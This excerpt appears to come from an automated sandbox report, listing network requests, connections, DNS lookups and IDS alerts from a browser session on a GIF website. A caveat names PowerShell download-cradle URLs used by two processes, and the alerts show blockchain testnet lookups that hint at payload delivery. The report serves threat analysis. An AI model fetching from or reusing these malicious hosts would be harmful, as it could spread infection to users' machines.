6628 chrome.exe | POST 204 | 142.251.141.110:443 | https://www.google-analytics.com/g/collect?v=2&tid=G-SBQLTNMKMZ&gtm=45je61f0h2v887026193za204zd887026193&_p=1769111392469&gcd=13l3l3l3l1l1&npa=0&dma=0&cid=1929394307.1769111393&ul=en-us&sr=1360x768&uaa=x86&uab=64&uafvl=Not(A%253ABrand%3B99.0.0.0%7CGoogle%2520Chrome%3B133.0.6943.127%7CChromium%3B133.0.6943.127&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&_s=1&tag_exp=103116026~103200004~104527906~104528501~104684208~104684211~105391252~115938465~115938469~116185179~116185180~116988315~117041588&sid=1769111392&sct=1&seg=0&dl=https%3A%2F%2Fwww.gifcen.com%2Fsatoru-gojo-gif-61%2F&dt=Satoru%20Gojo%20Gif%20-%20GIFcen&en=page_view&_fv=1&_nsi=1&_ss=1&_ee=1&tfd=1672 | CN unknown | reputation unknown
6628 chrome.exe | GET 200 | 142.250.185.170:443 | https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | CN unknown | binary, 41 b | whitelisted
6628 chrome.exe | GET 200 | 216.58.212.142:80 | http://clients2.google.com/time/1/current?cup2key=8:eiIrx2ThjUNgazX-Z9D-FC6Pbq4vL0L8b5jrex2MUNg&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | CN unknown | whitelisted
6628 chrome.exe | GET 200 | 172.67.150.41:443 | https://www.gifcen.com/satoru-gojo-gif-61/ | CN unknown | html, 46.8 Kb | reputation unknown
6628 chrome.exe | POST 200 | 74.125.206.84:443 | https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | CN unknown | text, 17 b | whitelisted
6628 chrome.exe | GET 200 | 172.67.150.41:443 | https://www.gifcen.com/wp-content/plugins/wp-rocket/assets/js/lazyload/16.1/lazyload.min.js | CN unknown | text, 7.71 Kb | reputation unknown
6628 chrome.exe | GET 200 | 172.67.150.41:443 | https://www.gifcen.com/wp-content/cache/min/1/ae8e06bb8ff66dcc2d2ff4a2a3f2f1fe.css | CN unknown | text, 85.5 Kb | reputation unknown
6628 chrome.exe | GET 200 | 74.125.29.94:443 | https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=133 | CN unknown | compressed, 79.0 Kb | whitelisted

Caveat: all ten requests shown come from chrome.exe (PID 6628) loading the landing page and its third-party scripts. The PowerShell download cradles visible in the command lines of PID 772 (http://194.150.220.218/4SLEYpfAk57hGubo/dn9b3) and PID 1324 (repl-fabric94.system-api-cloud-application.in.net/748412-crashreport) do not appear in this excerpt.

Connections (10 of 158 shown; PID, process, IP:port, domain, ASN, CN, reputation)

4 System | 192.168.100.255:137 | not routed | whitelisted
8544 RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6768 MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
8272 svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5568 SearchApp.exe | 2.16.241.205:443 | th.bing.com | AKAMAI-ASN1 | NL | whitelisted
5568 SearchApp.exe | 2.16.241.207:443 | th.bing.com | AKAMAI-ASN1 | NL | whitelisted
4 System | 192.168.100.255:138 | not routed | whitelisted
6628 chrome.exe | 74.125.29.94:443 | clientservices.googleapis.com | GOOGLE | US | whitelisted
6628 chrome.exe | 216.58.212.142:80 | clients2.google.com | GOOGLE | US | whitelisted
6628 chrome.exe | 142.250.185.170:443 | safebrowsingohttpgateway.googleapis.com | GOOGLE | US | whitelisted

DNS requests (10 of 130 shown; domain -> resolved IPs (reputation))

settings-win.data.microsoft.com -> 40.127.240.158, 4.231.128.59 (whitelisted)
google.com -> 142.251.141.78 (whitelisted)
th.bing.com -> 2.16.241.205, 2.16.241.218, 2.16.241.207, 2.16.241.201 (whitelisted)
www.bing.com -> 2.16.241.207, 2.16.241.218, 2.16.241.201, 2.16.241.205 (whitelisted)
clients2.google.com -> 216.58.212.142 (whitelisted)
clientservices.googleapis.com -> 74.125.29.94 (whitelisted)
www.gifcen.com -> 172.67.150.41, 104.21.30.5 (unknown)
safebrowsingohttpgateway.googleapis.com -> 142.250.185.170, 142.250.185.74, 142.250.185.138, 142.250.184.234, 216.58.206.42, 142.251.208.10, 142.250.185.202, 216.58.212.138, 172.217.20.138, 142.251.141.74, 142.250.185.106, 172.217.18.10, 216.58.206.74, 142.251.141.106, 142.251.140.170, 142.250.201.74 (whitelisted)
accounts.google.com -> 74.125.206.84 (whitelisted)
impressexaltsculptor.com -> 172.240.127.234, 172.240.108.84, 172.240.127.243, 172.240.253.132, 172.240.127.242, 172.240.127.244, 172.240.108.68, 172.240.108.76 (unknown)

Threats (network alerts, 10 of 31 shown; PID, process, class, message; domains are defanged as in the rule names)

6628 chrome.exe | Misc activity | ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
6628 chrome.exe | Misc activity | ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
6628 chrome.exe | Misc activity | ET INFO Observed Smart Chain Domain in TLS SNI (bsc-testnet .drpc .org)
6628 chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6628 chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6628 chrome.exe | Misc activity | ET INFO Observed Smart Chain Domain in DNS Lookup (data-seed-prebsc-1-s1 .bnbchain .org)
6628 chrome.exe | Misc activity | ET INFO Observed Smart Chain Domain in TLS SNI (data-seed-prebsc-1-s1 .bnbchain .org)
6628 chrome.exe | Misc activity | ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
6628 chrome.exe | Misc activity | ET INFO Observed External IP Lookup Domain (ip-info .ff .avast .com) in TLS SNI
6628 chrome.exe | Misc activity | ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)